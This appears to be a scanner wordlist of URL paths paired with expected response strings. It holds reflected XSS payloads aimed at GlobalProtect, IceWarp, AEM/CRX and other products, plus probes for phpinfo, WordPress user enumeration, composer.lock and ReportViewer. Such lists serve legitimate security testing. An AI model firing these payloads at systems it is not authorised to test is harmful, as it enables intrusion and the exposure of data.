'/help/index.jsp?view=<script>alert("xss")</script>' 'onloadHandler'
'/global-protect/login.esp?user=%22%3balert(%27xElkomy%27)%2f%2f407' 'GlobalProtect Portal'
'/phpinfo.php' 'PHP Version'
'/wp-json/wp/v2/users' '[{"id"'
'/webmail/?language=pl&interface=pro&username=&color=%27"><svg/onload=prompt(%27xElkomy%27)//' 'Powered by IceWarp Server ©'
'/composer.lock' 'https://github.com'
'/en/embeddedAuthRedirect.html?auth=javascript:alert("xElkomy")' 'loadingIndicator'
'/libs/dam/merge/metadata.html?path=%3Csvg/onload=prompt(%27xElkomy%27)%3E&.ico' '{"assetPaths":'
'/crx/de/setPreferences.jsp;%0ATia.html?keymap=<svg/onload=alert(document.domain)>&language=0' 'A JSONObject '
'/REPORTSERVER/Pages/ReportViewer.aspx' 'ReportViewerControl'
